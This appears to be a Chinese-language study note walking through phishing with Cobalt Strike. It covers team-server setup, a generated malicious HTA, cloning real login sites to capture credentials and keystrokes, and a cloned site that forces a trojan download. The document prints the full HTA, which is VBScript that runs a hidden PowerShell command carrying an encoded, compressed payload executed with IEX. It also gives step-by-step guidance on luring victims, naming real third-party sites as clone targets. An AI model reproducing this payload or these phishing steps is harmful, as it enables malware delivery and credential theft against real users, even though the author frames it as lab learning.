细说——Cobalt Strike钓鱼

总结了网上关于Cobalt Strike钓鱼的相关文章，合并成了这篇学习笔记

启动环境

环境介绍：
win7（虚拟机） 【攻击者】—— 192.168.239.132
win10（物理机）【受害者】

windows服务端启动

（以管理员身份启动cmd）

团队服务器的启动命令包含两个必填的参数和两个选填的参数。

第一个必选参数是团队服务器的外部可达 IP 地址。Cobalt Strike 使用这个值作为它的功能使用的默认主机地址。第二个必选参数是密码，Cobalt Strike 客户端使用此密码去连接至 Cobalt Strike 团队服务器。
第三个参数是选填的，这个参数指定一个「C2 拓展文件」【后续再说】
第四个参数也是选填的，此参数以 YYYY-MM-DD 的日期格式指定结束日期。团队服务器会将这个结束日
期嵌入到它生成的每个 Beacon stage 中。Beacon payload 在此日期后将拒绝运行，并且在此日期后
如果这个 Beacon payload 醒来也会自动结束(对应 Beacon 会话中的 exit选项)。

windows启动客户端

双击start.bat就行了

HTA恶意文件投递

HTA是HTML Application的缩写（HTML应用程序），是软件开发的新概念，直接将HTML保存成HTA的格式，就是一个独立的应用软件

1. 生成恶意HTA

1. 首先准备1个监听器

2. 生成恶意HTA文件

生成方式: Attack>Packages>HTML Application

这里他给我们提供了3种生成方式 exe,powershell,vba。其中VBA方法需要目标系统上的Microsoft Office，在系统支持的情况下我们一般选择powershell，因为这种方式更加容易免杀。通常我们结合host File(文件下载功能) 来实行钓鱼。
这里我们选择 powershell 生成 一个HTA

使用Notepad++打开生成的恶意hta文件，内容如下，可以看到其实就是一个 powershell命令。

<script language="VBScript">
	Function var_func()
		Dim var_shell
		Set var_shell = CreateObject("Wscript.Shell")
		var_shell.run "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB5AEwAWQBvAHoAWgBVADEAdQAxAHYAZwBDAGkAZwBnAHAAaQBqAEQAbQBwADEAQQBBAGoAbwBnAGoASQBEAEEAaQBlADMAZgA5ACsARwB0AFMAYwA3AE4AbgBzAHYAVgB0ADEAYgA2AHEAcwB6AEUAdAAzAFQALwBmAFQAegAvAFEAMABHAHEAYQAzAEcAZwAwAGQAawA4AHEAKwBoAFoAbgBiAE8AUQA2AEoANAAzAHQATQB2AFYAQwA0ADcAdgBrAFMAWgBiADQAdwBYADQAdQBGAFYAZQBTAFoATgBGAHYATwBCAHEAOAAyAHAAcQA5AEIANgBKAHUAdgB5AEwASgBDAFQAQQBqAHoAVgArAEYAcQBnAGsASwAwAFkAMAByAFgATQBRAHAAZgBkADcANABWAHUAYgBqAEMANQBKAE4ATQBFAEYAdABSAGkATQB0AFgAVgA0AFcAcgBmAEMAbgB5AEMARgByAGgAVgB3ADkAUgBKADgAYQB2AE8AMAB6AFgAdgBrAFgAZwBvAE4ASgB6AE8AdwBoADYALwBnADQANQAzAHMAdgBuAHoAOQAwAG8ARABMAEYASABUAC8ATwBxAGkARwBtAGIARQBMAHcAegBYAEEAZQBUAFUAcABuADUAeABqAHkAdQBjAFkAaAB2AHgAOABZAEcAbQA1AFQANQBpADcAbAArAHIAWQBxAHUAYgB5AEQAMwBMAEoAWgAyAGsAYgBtAEcAZwBOAHEAZQBsAGUAMgBOAGYAQgBOAGwARQBWAFMAMQB3AEgAVgBvAHEAZgBqAG4AbgA4AFgAeQA4ADIAMwB0AHAAYwByAHYASQArAFMAUwBVAGwARgBMAEMAYwBXADcAcQB1AFcANgB4AFQATAB6AHYAWgB3AGQATwBFAHMARABYAEMAcgBLAGoAaABuADYAeABGAC8AUgA2AHEAUABqAGMAZgBXAHEAbgBuAHUAdgA1AE0ANwBMAEoAOQArAEwANQBYAE4AawBkAG8AQQBnAGoAbAA4AEgAbQBWAGsAOQA2AFoAUwBLAE0ASgB3AEEATgB1ADAAVABoAHMAVQBLADgANQB5AGQAOQAvAHoAeQB3AG4AeAA5ADgAMABhAE4AUABPAHIAcwBjAEYAWAB5AEsAQQA3ADkAUQBNAE4AaAA3AEoAaQBZAFYAUAB2AEkAcwAxAHkAcwA0AGgAVwBvAEYAUQBtAGsAegA3AE8ATABaAFgAQQBpAHgARABRAEsAUABlAGIAaQBDACsAagBGAC8AaABhAFgAcgByADMASQBkAFMAdABnADkALwBsADMANwBiADYAVQBGAEgAeQA0AGcAUAB1ADcAUwBxAFgAMwBTAGkAQQAxAG8AVwBHADUAYwB1AGIARQA3ADgAQQBoADUANwB3ADUAbQBZAE4AdwBmAHYATAArAEgAYgBuAEsAOABQAGMAVAB3AGMAcQBGADcANABVAFAAcQBHAHAAaABGADkAdQBJADQAbABjAEsAKwBMADcAagBhAHUASABxADYAagBrAGYAWQBvAGkAbgBOAFAARwBKAGsAKwB0ADkAWQBkAGcASwBJADQATQBUAGkAUABwAGgAbQBxAFYAegBGAGsAYQA0AC8AUABKAFAAZgBrADcASABYAGoAUgBKADUAWgBlAEcAYQBoAGUAdABzADgANABwAFAAUwBjAC8AdgBqAEQAUABjADkAKwB4AFgAZwBwAFgANQBjAEsAWgBQAGQAbgA2AHEAeABFADUAcgBvAFgARABiAFAALwBYAHQANgBHAEgAVgA0ADYASABlADYAbQBIAGQAbwA1ADUASQBYAHoAcABvADUAegBoAGwAWQB0AHoAUABLAG8AWABNAFEAWAA4AEwAQgBYAFAARwA5AGoAcQBuAGQARQBwAFoAbwBBACsALwA2AHoARwA3AHgAegA2AHAAdABzADUATwBkAGMAMgBJAGUAOABFAHYAQQBKAEsAbABIADkAMAA1AHAAVABEAFUAbABIAHkAWgBMAHcARAAvAEUANQB6AG8ATwBuADEAQwBxADQAWgB2AGsAaQBmAHIAMQBaADYATwBUADIAYgBaADEAegB1AHUAbwBpAFEAQwBqAE8ASgA0AEoANgBiAEYAVQBiAEQAeQBNAFYAVwBoAFcAbAA3AHgARABsAHYAdABTAFAAcQA1ADgAUABpAFAAKwA3AEsAawBVAHMAZABFAHgARgA2AE0AZgBkAFMALwBnAEQAUwA4ADkARgBkADMANABNAGIARQA1AG0AUQBYAFkAQgBoAHAAZwBYAFkAZABKAEMAYgBvAFYASgBoACsAbwA2AEYATwA2AG4AbQAyAEIAYwBYAGkAaAA5AGkAMABrAFcAdQBDADEAYwBPAEwATQBXAFEARQAxAGoASgBzAE4AQgBvAHgAcABuAFEAcQB2AHkAYgBIACsAVwBxAGgAcQBtADAAQwAxAHkAOABBACsAbQA4AEMAZwBrAHUAcwBxAEgAbQBuAEcAOQBVAFQAagBkAGsAWQA2AHYANABIADkAeQArADMASgBQAFQAcABjAGkAdwB1AG8ARAAwAHoAbQBrAGcAZwBPAGIANgB0AE0ATABNAG4AWgBCAEMAWABTAHQAVwBmAGkATABlAC8AKwBiAGUAagB5AFgAbQBCAHoAZQA3AEkAVAA0AG4AcwBwAFIAZgB4AE8AZABPAFMAcgBQAHIAawBrAHUAYQAyAGUAUAB5ADUAUQAzAEwASABMAG0AUQBBAG0AcABDADYATwA4ADYAaQBPAEIAbQBRADgAdgBMAFcASwBuAEkAdABhAEsAOQBsAE0AcQBiAGEAVABNAFUAKwBWAGoAbwA3AC8AdgA4AEQASAA0AHgALwBMAGkAOQB3AEkAOQBHAEEAegBYAG8AcQBDAE8AVABqADgAYQBUAFAAagB0AFkAUwBkAE4AVwByAHgARQBkAEkAaQBtAGEAZABWAGgATwBZAEUASAB1AHUAQgBmADUAbABSAFMAUAAvAGEAZABhAHQARwB2AFUAcgBFAEMASwBGAFYAZwBqADkALwBzACsANgBVAGwAeAByADkAMgB2ADcAMwAyAGgAYQBUAHMAUABaAHoAcwBuAC8AYQBsAHgAcQBCAGsATABTAGIAZwAzAFIASwBIAFIAbgB4AE0AaABrACsAOQBMAGMAVQBmAFkAZAB4ADkAOABHAEgAKwBTADQAcQA0AC8AQQBMADEAVwBNAC8AQQA2AEIANgB1AEIAKwBVAEUAVABMADAAYgBtAGcAYQBNAHQAagBPAHcAawBIAGMANQB2AE4ATABZAG0AegBsAE4AbABOAE8AYwBEAFIAZgBPAHMAawBWAEcAYgBDAGcAUABsAFcATwBkAHAAdwBsAHAAOQBsAGIAVgA0AHMAcgBUAG0AZQA1ADYAYgBHAE0ATQBBADQAcABRADQAVwAyAHQANgBnADEAVABUAE8AcQBtADUAcABjAGMAcwBkAHIATwB2AGoASwB6AGgAdgBuAFYAbgBIAGUAdQBwAG8ARABRAEEAaAAwAFIATAA1AGYAVgBUADAAMAByAE0AaABYAEEAdwBGADgAbwBvADcAVAA4AHAASQB0AGoAZABSADQAOQAyAG8AeQA5AHIASABOAGoAVwByAE8AUgBnADYAVwBRADgAbQBOAEUAbgBiAG8ASgAyAGoAVABUADEARwBsADEAcABJAHkAVQBqAE0ANgBEAHoAeABhAEEAWgBvAHIAUQBiAGoAQgB4AHMAZABGAFkAMAAwAHgAMgBNAGwAdgBiAGcAZwBhAGMAbgAvAHoAUgBOAFQAUwAyAHcANwBmAFoAbgB2AFMASABZADkAcgBxAHkARABQADYAZwBPAHcASAByAEkARABNAGsARAB0AGgAcQBoAFgAdgBKAGsAVABkAHAAYwAyAE4AeQB5AGsARQAyAHQAawArADYAMwBoADAATABXAEQATwBJAEYATABwADQATwBLADEAUABWAHIAcAB1AGgAMgB3AFgAegBxADQAUABKAC8AdQBhAGoANQB5ADcAcAA4AGsAbgBvAGoAYgBTAGoAZQByAFcARwB2ADMAVQA5AHAAMwBOAFoAdQBPAHQAbQA0AHUANQBSADQAbgB6AEYATwB0AGoAYwAxAE8AUAA3ADQAOABkAFoAYwBXAFQAbwA5ADAAYwBSADMASwAvAEkAVABqAGoAbQA5AFoARQA2AHEANQA2AHkALwB1AEcAeABDADIAbgBxAHMAdQBQAG4ANwBhAHEATwBKAHUAYgB5ADMAYgA5AFQAbgA3AFUAZwA4AG0ATQBsAFcAVABCAFoAbQBmAHQAQQAyADMAUAArAEwAdgBaADEATABXAEcAVQAvADEAQgBGAE4AdABLAFoASQByAEIAcgBwADMANABDAHAALwBZAFAAUQB2AHkAbwBiAEsASgByAHIAYwBWAGEAaAAzAGsAZQBVACsAVgBuAHQAcQBjAE8AcAB5AHAAKwBnAEoAawBEAFUARQAxAFkAVwA2AHAAMgB0AGIASwA3AE8AYwAyAFkAWAAxAHQAZwBBADEAeAB2AGQANABaAGkAKwBXAGgANgB6AFEAQwA2AFYAUABqADAATgBCADcAUwB6AHgAMQBoAC8AdgBFAFgANwBzAFAAVQB5AHcAbgBNADUAMgA5AHMAVQAzADEAeQBaADQAKwBzAEUASQByAEcAZgBqAHoAVgBJADgAYgBHAG4AcQBRADYAaQBOAHgAWQBOAFIAMAArAHkAZwBjAEYATgBUAGsANgBSADAAZgByAEkAbAB5AE0AeAA2ADIAbABwADcAYwBFAHEAYgAzAHkASAB4AFkAMQBFAGsAMABGADgAVwBKAGkARAA4ADEAYgB5AFkAOQBSAFkANQAzADAAcwBDAE4AdAA2ADIAYgBUAHUAeQA0AHQAYgA3AGkAaQB2ADYAcQBIAGEAVgBPAFQARQB6AFUAbgBjAC8AYQBKAGwANABlAE8ARgAxADgAVgBLAGUASgBxADAAVABwAHcAdQA1AFQAYwBkAHUAbQBqAFcAWgA5AFAAbQB1AHAAMAAxAFgATgBpAFgAZgBiAHgAWABDACsANwBSADUAbgB3AGoAZwA1AGkAbwBuAFMAMwBJAGEAVwBaAEEAYgBTAE0AdgB6AFUAUwAyAHIAMwA0AFMATwBYAGMARABhAFIANABGAGEAWgBlAEMAegBwAFUAMABOAFEATwBMADAAMwBSADQATwBSAFAASwAwAEwARAAwAHEATgBQADYANAA1AGIARABsAHcAOAB1AE8ATQBHAEEAaQB4AFIATwBPADUAVwBNAEQAawBiAHEAbgBPADgAUABhAG8AZAAxAEcAOQBxADQAegBZAE8AOQBTAHgAZwBLAGYAYQBvAHoASwBTAGoAcwBCAG4AbABtAHkAawB1AHIAeQB4AGUASABxAC8ANQBuAG8AaQA4AFAAQwB3AEEANwA0AEEAagA1AHcAYgBiADMARABZAEUAKwBCAHAASwB2AGUAawBWAE0AbQA0AG0AbABBAFUAZABuAEsAdQAxAGwAYgB1AHYAagB0ADEARwBrAE4AagBNAHkAZQBRAGMARABrAGEAYwB2AFIAbwA4AG0AdABmAGgAVgB6AE4AeABRAE8AcgA4AGgAMwBJADUAYgBxAHQAUwBrAGQAKwBZAGMAMwBKAGwANgB3AGkAcgBmAHcAUQBlAG8AdwBrAGUANwBmAC8AWQBPAEQALwByAFUAdQBaAHQANQBvAEQAbABRAGEASwBXAEwAWgArAGMAMQBQAE8AMwB2ADYAMwBuAGUAZgByADUATwBYAFMAcQA3ADMATgBiADQAMABFAHIASABGADMAVwBmADMASwBkADIATAAwAHIAbQByADkAcQBnAEcAUwBVAFUAagBXAHkASQBWAHEAQgBrADMATQA1AFEAawBTAC8ARgBBADQAdAB5AEkAVAAzADgAawAwAFMAcQBXAFAAdQArAGMAdABEAGoAMwBzAFEAbQBjAEoAdgBlAGUAbABjAEwAZABkADEAegBlAHoANQB1AGsAWABYAFEAeQAwAGMAcQBjAEcANgB3AFUAZQBLAEIAMgBHAFgAUAAzAEQAVQBaAGwANQBFADQAUwBPADYAUgBTAFQARQBhADEAVwBlAFkATgB4AGoAdgBEAFMAWgAxADAARQBQADMAOQBlAFEAbgBpAFYAZAB5AEMATwBzAEcAZgBUAGQAWQBWAGgARQA0ADUAbAAyAGUAeAAvAGcAeQAwAFgAZgBoACsAVwByAGgAKwBrAHAAVABkAHoAbABhAHoAQgBlAHUAZgBKACsANQBQAGMALwBLAFQAeQBHAGYAMAB3ADgAbgBiADQALwA1AGkAQQBIAHcANwA5ADcAOQBCAG0ANABPAFUAOQAyAGgAdAAwAHUAVQBNAGYANAAxAFUAdQBGAEwAOABXAEMAdABLAEsAZQBiAGQATwBuAEMATgA4AGcAZQBBADkAMAA4AHEANQBSADQARABxADkASABiAGoARwAvAEMANQBrAHIAKwAvAHAAVwB0AFUAWgBpAFIAKwB3AFYAdwBqADUAagB0AHoAQwArAEcAMQBDAFYAZQBIAGIANQBiAFEAagByAEwASABtAEQAbAA5AGcAbgAxAGoARABzAGcANQBLAFgANQBqAFYARwB4AGkAYQBLAEYAdgBCADcANABCAEwATQBYAFEAVQAyAFcAbQBjAHkATwBaAE0ASwB6ADkARABRAEYAKwBmADcAbgBUAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=", 0, true
	End Function

	var_func
	self.close
</script>

2. HTA利用

这里配合cs的host file功能，生成一个下载恶意HTA的网址。

说明：在下文“网站克隆+木马下载”中会介绍到另一种思路，先制作一个假网站，当用户用假网站进入到真实
网站的时候，会下载恶意文件

3. 上钩

双击运行hta文件，即可上线cs

信息收集(System Profiler)

这里进行的信息收集主要已钓鱼为主，利用一个钓鱼网站，当点击了之后会根据useragent等传输信息来判断一些基础的信息，记录点击者ip地址和目标

1. 生成恶意地址

这里需要将Local URI不需要改动，主机地址写成服务器ip地址，最好是公网ip，这样才能有人访问到，端口可以更改，Redirect URL是代表重定向到另一个网页，以便于更好地隐藏自己，使用java的方框不需要选择

2. 战果

首先看到有人访问了网站，并收到2条应用信息

视角1：应用信息

视角2：目录列表

网站克隆

http类型网站

这里选择的是http://125.227.58.8/，一个不用域名的网站，主要是方便抓包分析

1. 克隆网站

2. 受害者访问克隆站点

此时访问到的是win7的地址，一会输入完成账密后，cs会怎么做呢？

随便输入个账密，然后，cs拿着我们输入的账密302跳转，去真实网站输入这些，并返回给我们真实结果

这一点值得好评，因为使用Social Engineering Toolkit (SET)的时候，它的处理思路是302跳转到真实网站，让用户再输入一次账密。

3. 监视日志

监视日志里面记录了详细的键盘信息

https类型网站

这里选择的是https://os.open.com.cn/Account/User/Login

操作步骤同上，不再赘述，只需注意更换端口

1. 访问钓鱼网站

2. web日志监视结果

这里值得好评，用Social Engineering Toolkit (SET)克隆https类型的网站会出现拿到账密的密文情况。

网站克隆+木马下载

首先克隆一个网站，当用户透过克隆网站去访问真实网站的时候，自动下载木马

1. 准备木马

1. 设置监听器

2. 生成木马

2. 生成木马地址

这里要特别注意第3步，默认的url地址里，文件后缀是有问题的

3. 克隆网站

这里第3步的克隆网站的端口，可以与木马地址保持一致，使用82端口

4. 受害者上钩

1. 访问网站，自动要求下载文件（如果是Edge的话，会无弹窗自动下载）

2. 受害者下载并运行了程序

参考

渗透地基钓鱼篇-Cobalt Strike钓鱼